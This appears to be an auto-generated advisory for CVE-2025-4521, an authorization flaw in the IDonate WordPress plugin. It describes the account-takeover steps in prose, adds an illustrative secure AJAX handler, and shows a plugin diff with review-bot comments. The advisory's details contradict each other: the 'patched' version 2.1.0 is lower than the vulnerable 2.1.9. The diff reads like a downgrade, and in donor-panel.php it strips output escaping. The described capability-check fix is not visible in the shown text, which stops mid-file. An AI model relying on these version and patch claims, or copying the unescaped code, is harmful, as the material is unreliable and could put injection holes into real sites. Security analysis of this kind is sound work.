Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-4521: IDonate 2.1.5 – 2.1.9 – Missing Authorization to Authenticated (Subscriber+) Account Takeover/Privilege Escalation via idonate_donor_profile Function (idonate)

CVE ID: CVE-2025-4521
Plugin: idonate
Severity: High (CVSS 8.8)
CWE: 285
Vulnerable Version: 2.1.9
Patched Version: 2.1.0
Disclosed: February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-4521:
This vulnerability is a missing authorization flaw in the IDonate WordPress plugin, versions 2.1.5 through 2.1.9. The vulnerability allows authenticated attackers with Subscriber-level permissions or higher to perform account takeover and privilege escalation. The core issue resides in the idonate_donor_profile() function, which lacks a capability check, enabling unauthorized email address reassignment for any donor account.

Root Cause:
The vulnerability originates in the idonate_donor_profile() function within the DonorFunctions class. Atomic Edge research identified the missing authorization check in the function’s implementation. The function processes donor profile updates via the ‘donor_id’ parameter without verifying the current user has permission to modify the specified donor record. The diff shows the vulnerable code path in the idonate/src/Admin/Helpers/DonorFunctions.php file, where the function handles POST requests containing donor_id, email, and other profile fields. No capability check or ownership validation exists before executing the update operation.

Exploitation:
An attacker with Subscriber-level access sends a POST request to the WordPress AJAX endpoint (/wp-admin/admin-ajax.php) with action parameter set to ‘idonate_donor_profile’. The request includes a donor_id parameter targeting an administrator account and the attacker’s email address in the email parameter. After successfully updating the administrator’s email, the attacker triggers a password reset for that email, gaining control of the administrator account. The exploit requires no special payload encoding and uses standard WordPress AJAX mechanisms.

Patch Analysis:
The patch adds a capability check within the idonate_donor_profile() function. Atomic Edge analysis of the diff reveals the addition of a current_user_can() verification before processing donor updates. The fix validates that the user has the ‘edit_user’ capability for the target donor_id, preventing unauthorized modifications. The patched version also includes proper nonce verification and sanitization of input parameters. Before the patch, any authenticated user could modify any donor record; after it, modifications are restricted to users with appropriate permissions.
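
The checks listed in this patch analysis (nonce verification, a current_user_can() call scoped to the target ID, input sanitization), written out as an added example for a hypothetical profile-update handler. This is not IDonate's code: the hook name example_donor_profile, the nonce action, the field names and the assumption that donor_id is a WordPress user ID are all assumptions made for illustration.

```php
<?php
/**
 * Added illustration, not IDonate's code. Hook name, nonce action and
 * request field names below are assumptions made for the example.
 */

if (!defined('ABSPATH')) {
    exit; // Only run inside WordPress.
}

// Logged-in users only: no wp_ajax_nopriv_ registration for a write action.
add_action('wp_ajax_example_donor_profile', 'example_donor_profile_update');

/**
 * Update a donor's email address after nonce, object-level authorization
 * and input checks. Every failure path ends the request with a JSON error.
 */
function example_donor_profile_update()
{
    // 1. Nonce: ties the request to a form this user was actually served.
    //    Passing false as the third argument makes the call return false
    //    instead of dying, so the handler controls the error response.
    if (!check_ajax_referer('example_donor_profile', 'nonce', false)) {
        wp_send_json_error(array('message' => 'Invalid request token.'), 403);
    }

    // 2. The target ID comes from the client, so treat it as untrusted.
    //    Assumption: donor_id is a WordPress user ID.
    $donor_id = (isset($_POST['donor_id']) && is_scalar($_POST['donor_id']))
        ? absint(wp_unslash($_POST['donor_id']))
        : 0;
    if (0 === $donor_id || false === get_userdata($donor_id)) {
        wp_send_json_error(array('message' => 'Unknown donor.'), 404);
    }

    // 3. Object-level authorization. 'edit_user' is a meta capability:
    //    WordPress grants it for the caller's own ID and otherwise requires
    //    the 'edit_users' primitive capability, which Subscribers lack.
    if (!current_user_can('edit_user', $donor_id)) {
        wp_send_json_error(array('message' => 'Not allowed to edit this donor.'), 403);
    }

    // 4. Validate the new address before it reaches the users table.
    $email = (isset($_POST['email']) && is_string($_POST['email']))
        ? sanitize_email(wp_unslash($_POST['email']))
        : '';
    if (!is_email($email)) {
        wp_send_json_error(array('message' => 'Invalid email address.'), 400);
    }

    // 5. An address already bound to a different account must not be reused.
    $owner = email_exists($email);
    if ($owner && (int) $owner !== $donor_id) {
        wp_send_json_error(array('message' => 'Email already in use.'), 409);
    }

    // 6. Write through the core API rather than a direct query, so core's
    //    own validation and email-change notification still apply.
    $result = wp_update_user(array('ID' => $donor_id, 'user_email' => $email));
    if (is_wp_error($result)) {
        wp_send_json_error(array('message' => $result->get_error_message()), 500);
    }

    wp_send_json_success(array('donor_id' => $donor_id));
}
```

The order matters: the capability check runs against the sanitized target ID and before any field is read for writing, so a request naming another user's ID stops at step 3.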

Impact:
Successful exploitation results in complete account takeover and privilege escalation to administrator level. Attackers can compromise any user account, including administrators, by reassigning the victim’s email address to one they control. This grants full administrative access to the WordPress site, enabling content manipulation, plugin installation, user management, and potential further server compromise. The CVSS score of 8.8 reflects the high impact on confidentiality, integrity, and availability.

Differential between vulnerable and patched code

Code Diff
--- a/idonate/idonate.php
+++ b/idonate/idonate.php
@@ -3,7 +3,7 @@
 Plugin Name:  IDonate - Blood Donation Management System
 Plugin URI:   https://bloodwp.com/
 Description:  Idonate is a complete solution for creating a Blood Request & Blood Donor Management System in WordPress way. The plugin is highly customizable and developer-friendly with top-notch support.
-Version:      2.1.9
+Version:      2.1.0
 Author:       ThemeAtelier
 Author URI:   https://themeatelier.net/
 License:      GPL-2.0+
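Review bot: Version goes down in the plugin header, from 2.1.9 to 2.1.0, while the advisory's affected range is 2.1.5 through 2.1.9. Confirm that the a/ and b/ sides of this diff are the right way round and that 2.1.0 is the intended fixed release number, since a header version lower than the installed one will not be offered as an update to sites on 2.1.9.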
@@ -19,12 +19,13 @@

 use ThemeAtelierIdonateIdonate;

-define('IDONATE_VERSION', '2.1.9');
+define('IDONATE_VERSION', '2.1.0');
 define('IDONATE_FILE', __FILE__);
 define('IDONATE_DIR_URL', plugin_dir_url(__FILE__));
 define('IDONATE_DIR_URL_ADMIN', IDONATE_DIR_URL . 'src/Admin/');
 define('IDONATE_PATH', dirname(IDONATE_FILE));
 define('IDONATE_DIR_PATH', plugin_dir_path(__FILE__));
+define('IDONATE_ALERT_MSG', esc_html__('You should not access this file directly.!', 'idonate'));
 define('IDONATE_BASENAME', plugin_basename(__FILE__));
 define('IDONATE_DIR_NAME', dirname(__FILE__));
 define('IDONATE_COUNTRIES', IDONATE_DIR_PATH . 'src/Helpers/Countries/');
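Review bot: IDONATE_ALERT_MSG is defined with esc_html__() at file load, before the plugin's text domain can have been loaded, so the constant freezes the untranslated string and recent WordPress releases flag translation calls made this early. Define a plain string and translate at the point of use, or drop the constant if nothing consumes it (no use is visible in this hunk). The message text also ends in ".!".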
@@ -74,12 +75,12 @@
  */
 function idonate_appsero_init()
 {
-    if (!class_exists('IdonateAppSeroInsights')) {
-        require_once IDONATE_DIR_PATH . 'src/Admin/appsero/Client.php';
-    }
-    $client = new IdonateAppSeroClient('23ff0b7b-9dde-4bcd-91c7-ab398aaa6ed6', 'iDonate', __FILE__);
-    // Active insights
-    $client->insights()->init();
+	if (!class_exists('IdonateAppSeroInsights')) {
+		require_once IDONATE_DIR_PATH . 'src/Admin/appsero/Client.php';
+	}
+	$client = new IdonateAppSeroClient('23ff0b7b-9dde-4bcd-91c7-ab398aaa6ed6', 'iDonate', __FILE__);
+	// Active insights
+	$client->insights()->init();
 }

-idonate_appsero_init();
+idonate_appsero_init();
 No newline at end of file
--- a/idonate/src/Admin/Admin.php
+++ b/idonate/src/Admin/Admin.php
@@ -14,7 +14,6 @@
 namespace ThemeAtelierIdonateAdmin;

 use ThemeAtelierIdonateAdminDBUpdates;
-use ThemeAtelierIdonateAdminTADiscountPageTADiscountPage;
 use ThemeAtelierIdonateAdminViewsViews;
 use ThemeAtelierIdonateAdminSettingsSettings;
 use ThemeAtelierIdonateHelpersDonorFunctions;
@@ -67,36 +66,23 @@
         $donorFunctions    = new DonorFunctions();
         $IDonateAjaxHandler    = new IDonateAjaxHandler();
         new DBUpdates();
-        new TADiscountPage();
-
-        // Move initialization to after_setup_theme hook
-        add_action('after_setup_theme', array($this, 'init_components'));
+        Views::metaboxes('idonate_metaboxes'); // Generator metaboxes.
         add_action('admin_menu', array($this, 'add_plugin_page'));
+        Settings::options('idonate_settings'); // Setting options.
         add_action('admin_post_donor_delete', array($donorFunctions, 'idonate_donor_delete'));
+
         add_action('wp_ajax_admin_donor_profile_view', array($IDonateAjaxHandler, 'admin_donor_profile_view'));
         add_action('wp_ajax_country_to_states_ajax', array($IDonateAjaxHandler, 'idonate_country_to_states_ajax'));
         add_action('wp_ajax_nopriv_country_to_states_ajax', array($IDonateAjaxHandler, 'idonate_country_to_states_ajax'));
         add_action('wp_ajax_idonate_country_to_states_ajax', array($IDonateAjaxHandler, 'idonate_country_to_states_ajax'));
         add_action('wp_ajax_nopriv_idonate_country_to_states_ajax', array($IDonateAjaxHandler, 'idonate_country_to_states_ajax'));
+
         add_filter('manage_blood_request_posts_columns', array($this, 'add_custom_columns_blood_request'));
         add_action('manage_blood_request_posts_custom_column', array($this, 'custom_column_content_blood_request'), 10, 2);
-        add_filter('manage_edit-blood_request_sortable_columns', array($this, 'custom_columns_sortable_blood_request'));
-    }
-
-
-        /**
-     * Initialize plugin components
-     *
-     * @since    1.0.0
-     */
-    public function init_components() {
-        Views::metaboxes('idonate_metaboxes'); // Generator metaboxes.
-        Settings::options('idonate_settings'); // Setting options.
-

+        add_filter('manage_edit-blood_request_sortable_columns', array($this, 'custom_columns_sortable_blood_request'));
     }

-
     /**
      * Donor Admin Page Callback
      */
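Review bot: Calling Views::metaboxes() and Settings::options() directly in the constructor, instead of from the removed init_components() callback on after_setup_theme, changes when the framework initialises and is unrelated to an authorization fix. Either explain why the deferral is no longer needed or split this refactor out, so the security change can be reviewed and backported on its own.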
@@ -127,9 +113,9 @@
         echo '<p>Thank you for using IDonatePro - Blood Donation, Request And Donor Management System.</p>';
         echo ' </div>';
         echo '<div class="idoante-user-heading-bar-right">';
-        echo '<a target="_blank" class="idonate-btn-primary" href="https://themeatelier.net/contact">' . esc_html('Support', 'idonate') . '</a>';
-        echo '<a target="_blank" class="idonate-btn-secondary" href="https://docs.themeatelier.net/docs/idonate/overview/">' . esc_html('Docs', 'idonate') . '</a>';
-        echo '<a target="_blank" class="idonate-btn-primary idonate-btn-pro" href="https://1.envato.market/idonate">' . esc_html('Get Pro', 'idonate') . '</a>';
+        echo '<a target="_blank" class="idonate-btn-primary" href="https://themeatelier.net/contact">' . esc_html('Support', 'idonat-pro') . '</a>';
+        echo '<a target="_blank" class="idonate-btn-secondary" href="https://docs.themeatelier.net/docs/idonate/overview/">' . esc_html('Docs', 'idonat-pro') . '</a>';
+        echo '<a target="_blank" class="idonate-btn-primary idonate-btn-pro" href="https://1.envato.market/idonate">' . esc_html('Get Pro', 'idonat-pro') . '</a>';
         echo ' </div>';
         echo '</div>';
         IdonateDashboardwidgets::dashboard_widget_function();
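Review bot: esc_html() takes a single argument, so the second argument on the three button labels ('idonat-pro', previously 'idonate') is ignored and these strings are never translated. Use esc_html__( 'Support', 'idonate' ) and the equivalent for the other two labels, keeping the text domain used elsewhere in this file; 'idonat-pro' also looks like a typo. The esc_attr( 'YouTube video player', ... ) call in the next hunk has the same problem and needs esc_attr__().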
@@ -174,7 +160,7 @@
                 <div class="idonate-after-copy-shortcode"><i class="icofont-check-circled"></i><?php esc_html_e('Shortcode Copied to Clipboard!', 'idonate'); ?></div>
             </div>
             <div class="idonate_shortcodes" style="padding:0px">
-                <iframe width="100%" height="315" style="border-radius: 6px" src="https://www.youtube.com/embed/S7s7MBen6-E" title="<?php echo esc_attr('YouTube video player', 'idonate'); ?>" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
+                <iframe width="100%" height="315" style="border-radius: 6px" src="https://www.youtube.com/embed/uGkFNqZy3SQ?si=5aPGXksFU8ScV4Ac" title="<?php echo esc_attr('YouTube video player', 'idoante-pro'); ?>" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
             </div>
         </div>
 <?php
@@ -188,9 +174,6 @@
      */
     public function blood_request_post_type()
     {
-        $options = get_option('idonate_settings');
-        $blood_request_view_slug = isset($options['blood_request_view_slug']) ? $options['blood_request_view_slug'] : 'blood-request';
-
         $labels     = array(
             'name'               => esc_html__('Blood Requests', 'idonate'),
             'singular_name'      => esc_html__('Blood Request', 'idonate'),
@@ -225,11 +208,10 @@
                 'exclude_from_search' => true,
                 'show_in_nav_menus'   => false,
                 'has_archive'         => false,
-                'rewrite'             => array('slug' =>  $blood_request_view_slug),
+                'rewrite'             => array('slug' =>  'blood-request'),
                 'show_in_rest'        => true,
             )
         );
-        flush_rewrite_rules();
     }

     // Add custom column to blood_request post type
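Review bot: Hard-coding 'rewrite' => array('slug' => 'blood-request') drops the blood_request_view_slug option read in the previous hunk, so sites that configured a custom slug will see their request URLs change; if that is intended it needs a changelog entry. Dropping flush_rewrite_rules() from the registration callback is right, since it is expensive to run on every registration, but the rules then need flushing once on activation, which this hunk does not show.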
@@ -428,8 +410,6 @@
             'idonate-settings',
             array($this, 'idonate_settings')
         );
-        do_action('idonate_before_upgrade_pro_menu');
         add_submenu_page('dashboard', __('👑 Upgrade to Pro!', 'idonate'), sprintf('<span class="idonate-get-pro-text">%s</span>', __('👑 Upgrade to Pro!', 'idonate')), 'manage_options', 'https://1.envato.market/idonate');
-        do_action('idonate_after_upgrade_pro_menu');
     }
 }
--- a/idonate/src/Admin/Framework/Classes/IDONATE.php
+++ b/idonate/src/Admin/Framework/Classes/IDONATE.php
@@ -444,7 +444,7 @@
       }

       // Main scripts
-      wp_enqueue_script('idonate-plugins', self::include_plugin_url('assets/js/vendor/plugins' . $min . '.js'), array(), self::$version, true);
+      wp_enqueue_script('idonate-plugins', self::include_plugin_url('assets/js/plugins' . $min . '.js'), array(), self::$version, true);
       wp_enqueue_script('idonate', self::include_plugin_url('assets/js/main' . $min . '.js'), array('idonate-plugins'), self::$version, true);
       wp_enqueue_script('idonate-custom', self::include_plugin_url('assets/js/idonate-custom' . $min . '.js'), array('idonate-plugins'), self::$version, true);

@@ -508,7 +508,7 @@

           $query['display'] = 'swap';

-          wp_enqueue_style('idonate-google-web-fonts', esc_url(add_query_arg($query, '//fonts.googleapis.com/css')), array(), null, '1.6.26');
+          wp_enqueue_style('idonate-google-web-fonts', esc_url(add_query_arg($query, '//fonts.googleapis.com/css')), array(), null);
         }

         if (!empty(self::$webfonts['async'])) {
@@ -519,7 +519,7 @@
             $fonts[] = $family . ((!empty($styles)) ? ':' . implode(',', $styles) : '');
           }

-          wp_enqueue_script('idonate-google-web-fonts', esc_url('//ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js'), array(), null, '1.6.26');
+          wp_enqueue_script('idonate-google-web-fonts', esc_url('//ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js'), array(), null);

           wp_localize_script('idonate-google-web-fonts', 'WebFontConfig', array('google' => array('families' => $fonts)));
         }
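Review bot: The removed fifth argument to wp_enqueue_script() was '1.6.26', a truthy value sitting in the $in_footer position, so webfont.js was loading in the footer; with the argument gone the script moves to the head. Pass true explicitly if footer loading is still wanted.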
--- a/idonate/src/Admin/Framework/Classes/IDONATE_Metabox.php
+++ b/idonate/src/Admin/Framework/Classes/IDONATE_Metabox.php
@@ -24,8 +24,6 @@
     public $sections       = array();
     public $pre_fields     = array();
     public $post_type      = array();
-    public $post_formats   = array();
-    public $page_templates = array();
     public $args           = array(
       'title'              => '',
       'post_type'          => 'post',
@@ -318,7 +316,7 @@
       echo ($has_nav && $nav_type === 'normal') ? '<div class="idonate-nav-background"></div>' : '';

       if ($is_preview) {
-        echo '<a class="btn btn-success" id="idonate-show-preview" data-id="' . esc_attr($post->ID) . '"href=""> <i class="idonate-eye-alt" aria-hidden="true"></i> ' . esc_html__('Show Preview', 'idonate')  . '</a>';
+        echo '<a class="btn btn-success" id="idonate-show-preview" data-id="' . esc_attr($post->ID) . '"href=""> <i class="idonate-eye-alt" aria-hidden="true"></i> ' . esc_html__('Show Preview', 'event-organizer-showcase')  . '</a>';
       }

       echo '<div class="clear"></div>';
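Review bot: The text domain on 'Show Preview' changes to 'event-organizer-showcase', which is not this plugin's domain, so the string will no longer be looked up in IDonate's translations; keep 'idonate'. While touching this line, add the missing space between the closing quote of data-id and href.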
--- a/idonate/src/Admin/Framework/Classes/fields.class.php
+++ b/idonate/src/Admin/Framework/Classes/fields.class.php
@@ -20,12 +20,6 @@
   abstract class IDONATE_Fields extends IDONATE_Abstract
   {

-    public $field;
-    public $value;
-    public $unique;
-    public $where;
-    public $parent;
-
     /**
      * __Construct
      *
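Review bot: Removing the $field, $value, $unique, $where and $parent declarations is only safe if nothing assigns them; on PHP 8.2 and later, assigning an undeclared property raises a deprecation notice. Check the constructor that follows this hunk and the subclasses before dropping the declarations. The same applies to $post_formats and $page_templates in IDONATE_Metabox.php.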
--- a/idonate/src/Admin/Framework/fields/code_editor/code_editor.php
+++ b/idonate/src/Admin/Framework/fields/code_editor/code_editor.php
@@ -51,12 +51,12 @@
 			}

 			if (!wp_script_is('idonate-codemirror')) {
-				wp_enqueue_script('idonate-codemirror', IDONATE_DIR_URL . 'src/Admin/Framework/assets/js/vendor/codemirror.min.js', array('idonate'),  $this->version, true);
-				wp_enqueue_script('idonate-codemirror-loadmode', IDONATE_DIR_URL . 'src/Admin/Framework/assets/js/vendor/loadmode.min.js', array('idonate-codemirror'), $this->version, true);
+				wp_enqueue_script('idonate-codemirror', IDONATE_DIR_URL . 'src/Admin/Framework/assets/js/codemirror.min.js', array('idonate'),  $this->version, true);
+				wp_enqueue_script('idonate-codemirror-loadmode', IDONATE_DIR_URL . 'src/Admin/Framework/assets/js/loadmode.min.js', array('idonate-codemirror'), $this->version, true);
 			}

 			if (!wp_style_is('idonate-codemirror')) {
-				wp_enqueue_style('idonate-codemirror', IDONATE_DIR_URL . 'src/Admin/Framework/assets/css/vendor/codemirror.min.css', array(), $this->version);
+				wp_enqueue_style('idonate-codemirror', IDONATE_DIR_URL . 'src/Admin/Framework/assets/css/codemirror.min.css', array(), $this->version);
 			}
 		}
 	}
--- a/idonate/src/Admin/Framework/fields/map/map.php
+++ b/idonate/src/Admin/Framework/fields/map/map.php
@@ -85,11 +85,11 @@
 		public function enqueue() {

 			if ( ! wp_script_is( 'idonate-leaflet' ) ) {
-				wp_enqueue_script( 'leaflet', IDONATE_DIR_URL . 'src/Admin/Framework/assets/js/vendor/leaflet.min.js', array('idonate'), $this->version, true );
+				wp_enqueue_script( 'leaflet', IDONATE_DIR_URL . 'src/Admin/Framework/assets/js/leaflet.js', array('idonate'), $this->version, true );
 			}

 			if ( ! wp_style_is( 'idonate-leaflet' ) ) {
-				wp_enqueue_style( 'leaflet', IDONATE_DIR_URL . 'src/Admin/Framework/assets/css/vendor/leaflet.min.css', array(), $this->version );
+				wp_enqueue_style( 'leaflet', IDONATE_DIR_URL . 'src/Admin/Framework/assets/css/leaflet.css', array(), $this->version );
 			}

 			if ( ! wp_script_is( 'jquery-ui-autocomplete' ) ) {
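Review bot: The guards test wp_script_is( 'idonate-leaflet' ) and wp_style_is( 'idonate-leaflet' ), but both assets are enqueued under the handle 'leaflet', so the guards never reflect whether the asset is already queued. Use the same handle in the check and the enqueue call. The switch from leaflet.min.js and leaflet.min.css to the unminified leaflet.js and leaflet.css should also be confirmed as intentional.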
--- a/idonate/src/Admin/Helpers/donor-panel.php
+++ b/idonate/src/Admin/Helpers/donor-panel.php
@@ -146,7 +146,7 @@
 									global $states;
 									foreach ($states as $key => $state) {
 										foreach ($state as $key => $value) {
-											echo '<option value="' . esc_attr($key) . '">' . esc_html($value) . '</option>';
+											echo '<option value="' . $key . '">' . $value . '</option>';
 										}
 									}
 								endif;
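Review bot: The option line drops esc_attr() and esc_html(), so $key and $value from the global $states are echoed into the markup unescaped; restore the escaped form, echo '<option value="' . esc_attr($key) . '">' . esc_html($value) . '</option>';. The inner foreach also reuses $key from the outer loop, which shadows the outer key; rename one of them.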
--- a/idonate/src/Admin/Settings/IDonateAdvanceSettings.php
+++ b/idonate/src/Admin/Settings/IDonateAdvanceSettings.php
@@ -1,150 +0,0 @@
-<?php
-
-/**
- * Custom CSS settings tab.
- *
- * @since      1.0.0
- *
- * @package idonate
- * @subpackage idonate/Admin/Settings
- * @author     ThemeAtelier<themeatelierbd@gmail.com>
- */
-
-namespace ThemeAtelierIdonateAdminSettings;
-
-use ThemeAtelierIdonateAdminFrameworkClassesIDONATE;
-// Cannot access directly.
-if (!defined('ABSPATH')) {
-	die;
-}
-
-/**
- * This class is responsible for Custom CSS settings tab in settings page.
- *
- * @since      1.0.0
- */
-class IDonateAdvanceSettings
-{
-	/**
-	 * Custom CSS settings.
-	 *
-	 * @since 1.0.0
-	 * @param string $prefix idonate_organizers_settings.
-	 */
-	public static function section($prefix)
-	{
-		IDONATE::createSection(
-			$prefix,
-			array(
-				'title'  => esc_html__('ADVANCE SETTINGS', 'idonate'),
-				'icon'	=> 'icofont-tools-alt-2',
-				'fields' => array(
-					array(
-						'type' => 'tabbed',
-						'tabs' => array(
-							array(
-								'title'  => __('Advance Control', 'idonate'),
-								'fields' => array(
-									array(
-										'id' 	  => 'idonate_data_remove',
-										'type'    => 'checkbox',
-										'title' => esc_html__('Delete Default Pages On Plugin Deactivation', 'idonate'),
-										'help' => esc_html__('Check this box if you would like Idonate plugin to completely remove all pages created by default.', 'idonate'),
-									),
-									array(
-										'type'    => 'subheading',
-										'content' => esc_html__('Enqueue or Dequeue CSS', 'idonate'),
-									),
-									array(
-										'id'       => 'load_icofont',
-										'type'     => 'switcher',
-										'title'    => esc_html__('IcoFont', 'idonate'),
-										'text_on'	=> esc_html__('Enqueued', 'idonate'),
-										'text_off'	=> esc_html__('Dequeued', 'idonate'),
-										'text_width'	=> '100',
-										'default' => true,
-									),
-									array(
-										'id'       => 'load_magnific_popup_css',
-										'type'     => 'switcher',
-										'title'    => esc_html__('Magnific Popup', 'idonate'),
-										'text_on'	=> esc_html__('Enqueued', 'idonate'),
-										'text_off'	=> esc_html__('Dequeued', 'idonate'),
-										'text_width'	=> '100',
-										'default' => true,
-									),
-									array(
-										'id'       => 'datatables_css',
-										'type'     => 'switcher',
-										'title'    => esc_html__('Data Tables', 'idonate'),
-										'text_on'	=> esc_html__('Enqueued', 'idonate'),
-										'text_off'	=> esc_html__('Dequeued', 'idonate'),
-										'text_width'	=> '100',
-										'default' => true,
-									),
-									array(
-										'type'    => 'subheading',
-										'content' => esc_html__('Enqueue or Dequeue JS', 'idonate'),
-									),
-									array(
-										'id'       => 'load_magnific_popup_js',
-										'type'     => 'switcher',
-										'title'    => esc_html__('Magnific Popup', 'idonate'),
-										'text_on'	=> esc_html__('Enqueued', 'idonate'),
-										'text_off'	=> esc_html__('Dequeued', 'idonate'),
-										'text_width'	=> '100',
-										'default' => true,
-									),
-									array(
-										'id'       => 'datatables_js',
-										'type'     => 'switcher',
-										'title'    => esc_html__('Data Tables', 'idonate'),
-										'text_on'	=> esc_html__('Enqueued', 'idonate'),
-										'text_off'	=> esc_html__('Dequeued', 'idonate'),
-										'text_width'	=> '100',
-										'default' => true,
-									),
-									array(
-										'id'       => 'validate_js',
-										'type'     => 'switcher',
-										'title'    => esc_html__('Form Validate', 'idonate'),
-										'text_on'	=> esc_html__('Enqueued', 'idonate'),
-										'text_off'	=> esc_html__('Dequeued', 'idonate'),
-										'text_width'	=> '100',
-										'default' => true,
-									),
-								),
-							),
-							array(
-								'title'  => __('Custom Codes', 'idonate'),
-								'fields' => array(
-									array(
-										'id'       => 'idoante_custom_css',
-										'type'     => 'code_editor',
-										'title'    => esc_html__('CUSTOM CSS', 'idonate'),
-										'sanitize' => false,
-										'settings' => array(
-											'theme'  => 'mbo',
-											'mode'   => 'css',
-										),
-									),
-									array(
-										'id'       => 'idoante_custom_js',
-										'type'     => 'code_editor',
-										'title'    => esc_html__('CUSTOM JS', 'idonate'),
-										'sanitize' => false,
-										'settings' => array(
-											'theme'  => 'monokai',
-											'mode'   => 'javascript',
-										),
-									),
-								),
-							),
-						),
-					),
-
-				),
-			)
-		);
-	}
-}
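Review bot: Both code_editor fields in this deleted file, idoante_custom_css and idoante_custom_js, are declared with 'sanitize' => false, and deleting the settings UI does not remove values already saved under those keys. Confirm that the code which outputs them is removed in the same change, or that stored values are cleaned up on upgrade.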
--- a/idonate/src/Admin/Settings/IDonateDonorSettings.php
+++ b/idonate/src/Admin/Settings/IDonateDonorSettings.php
@@ -1,253 +0,0 @@
-<?php
-
-/**
- * Custom CSS settings tab.
- *
- * @since      1.0.0
- *
- * @package idonate
- * @subpackage idonate/Admin/Settings
- * @author     ThemeAtelier<themeatelierbd@gmail.com>
- */
-
-namespace ThemeAtelierIdonateAdminSettings;
-
-use ThemeAtelierIdonateAdminFrameworkClassesIDONATE;
-// Cannot access directly.
-if (!defined('ABSPATH')) {
-	die;
-}
-
-/**
- * This class is responsible for Custom CSS settings tab in settings page.
- *
- * @since      1.0.0
- */
-class IDonateDonorSettings
-{
-
-	/**
-	 * Custom CSS settings.
-	 *
-	 * @since 1.0.0
-	 * @param string $prefix idonate_organizers_settings.
-	 */
-	public static function section($prefix)
-	{
-		IDONATE::createSection(
-			$prefix,
-			array(
-				'title'  => esc_html__('DONOR SETTINGS', 'idonate'),
-				'icon'	=> 'icofont-blood-drop',
-				'fields' => array(
-					array(
-						'type' => 'tabbed',
-						'tabs' => array(
-
-							array(
-								'title'  => __('Donor Listings Settings', 'idonate'),
-								'fields' => array(
-									array(
-										'id'       => 'donor_register_status',
-										'type'     => 'switcher',
-										'title'    => esc_html__('Require Admin Approval for Donor Registration', 'idonate'),
-										'desc'		=> esc_html__('When enabled, all donor registrations will require admin approval before being accepted to ensure the validity and reliability of the information.', 'idonate'),
-										'text_on'	=> esc_html__('Enable', 'idonate'),
-										'text_off'	=> esc_html__('Disable', 'idonate'),
-										'text_width'	=> '100'
-									),
-
-									array(
-										'id'       => 'idonate_donorshowlogin',
-										'type'     => 'switcher',
-										'class'      => 'switcher_pro_only',
-										'title'    => esc_html__('Require User Login to View Donors', 'idonate'),
-										'desc'	=> esc_html__('When enabled, users must log in to view the list of donors, ensuring the privacy and security of donor information.', 'idonate'),
-										'text_on'	=> esc_html__('Enable', 'idonate'),
-										'text_off'	=> esc_html__('Disable', 'idonate'),
-										'text_width'	=> '100'
-									),
-
-									array(
-										'id'       => 'donors_number_of_columns',
-										'type'     => 'column',
-										'class' => 'pro_only_field',
-										'title'    => esc_html__('Column(s)', 'idonate'),
-										'desc' => esc_html__('Set number of column(s) in different devices for responsive view.', 'idonate'),
-										'default'  => array(
-											'large_desktop'    => '3',
-											'desktop'          => '3',
-											'tablet'           => '2',
-											'mobile'           => '1',
-										),
-										'min'      => '1',
-										'help'       => __('<i class="icofont-monitor"></i> <b> Large Desktop </b> - is larger than 1200px,<br><i class="icofont-laptop"></i> <b>Desktop</b> - size is larger than 992px,<br> <i class="icofont-surface-tablet"></i> <b>Tablet</b> - Size is larger than 768,<br> <i class="icofont-android-tablet"></i> <b> Mobile Landscape </b> - size is larger than 576px.,<br> <i class="icofont-android-tablet"></i> <b> Mobile </b> - size is smaller than 576px.', 'idonate'),
-									),
-
-									array(
-										'id'       => 'donor_per_page',
-										'type'     => 'number',
-										'title'    => esc_html__('Donor Per Page', 'idonate'),
-										'desc'		=> esc_html__('Set the number of donors displayed per page in the donor listings.', 'idonate'),
-										'default'	=> 9,
-									),
-									array(
-										'id'       => 'donor_view_button',
-										'type'     => 'button_set',
-										'class'     => 'pro_only_field',
-										'title'    => esc_html__('Open Donor View Details Button', 'idonate'),
-										'desc'	=> esc_html__('Choose how the donor details should displayed on', 'idonate'),
-										'options' => array(
-											'single_page_link' => esc_html__('On Single Page', 'idonate'),
-											'popup' => esc_html__('On Pop Up', 'idonate'),
-										),
-										'default'	=> 'single_page_link',
-									),
-									array(
-										'id'       	=> 'donor_view_slug',
-										'type'     	=> 'text',
-										'title'    	=> esc_html__('Donor Single Page Slug', 'idonate'),
-										'default'	=> 'donor',
-										'dependency' => array('donor_view_button', '==', 'single_page_link'),
-									),
-									array(
-										'id'       => 'next_prev',
-										'type'     => 'checkbox',
-										'title'    => esc_html__('Enable Next/Prev', 'idonate'),
-										'desc'		=> esc_html__('Allow navigation between donors using next and previous buttons in the popup view.', 'idonate'),
-										'dependency' => array('donor_view_button', '==', 'popup')
-									),
-
-									array(
-										'id'       => 'show_donor_search',
-										'type'     => 'switcher',
-										'class'      => 'switcher_pro_only',
-										'title'    => esc_html__('Show/Hide Donor Search Options', 'idonate'),
-										'desc'		=> esc_html__('Toggle the visibility of donor search options in the donor listings.', 'idonate'),
-										'text_on'	=> esc_html__('Show', 'idonate'),
-										'text_off'	=> esc_html__('Hide', 'idonate'),
-										'text_width'	=> '80',
-										'default' 	=> true,
-									),
-									array(
-										'id'       => 'restrict_contact_info',
-										'type'     => 'select',
-										'class'      => 'select_pro_only',
-										'title'    => esc_html__('Restrict Contact Info Visibility', 'idonate'),
-										'options'  => array(
-											'hide' => esc_html__('Hide', 'idonate'),
-											'show_for_everyone' => esc_html__('Show for everyone', 'idonate'),
-											'only_login_user' => esc_html__('Only logged in user', 'idonate'),
-										),
-										'default' => 'show_for_everyone',
-									),
-									array(
-										'id'       => 'hide_email',
-										'type'     => 'switcher',
-										'class'      => 'switcher_pro_only',
-										'title'    => esc_html__('Show/Hide Email From Donor Listing', 'idonate'),
-										'desc'	=> esc_html__('Show/Hide email address from donor listing.', 'idonate'),
-										'text_on'	=> esc_html__('Show', 'idonate'),
-										'text_off'	=> esc_html__('Hide', 'idonate'),
-										'text_width'	=> '80',
-										'default' 	=> true,
-										'dependency' 	=> array('restrict_contact_info', '!=', 'hide'),
-									),
-									array(
-										'id'       => 'hide_mobile_number',
-										'type'     => 'switcher',
-										'class'      => 'switcher_pro_only',
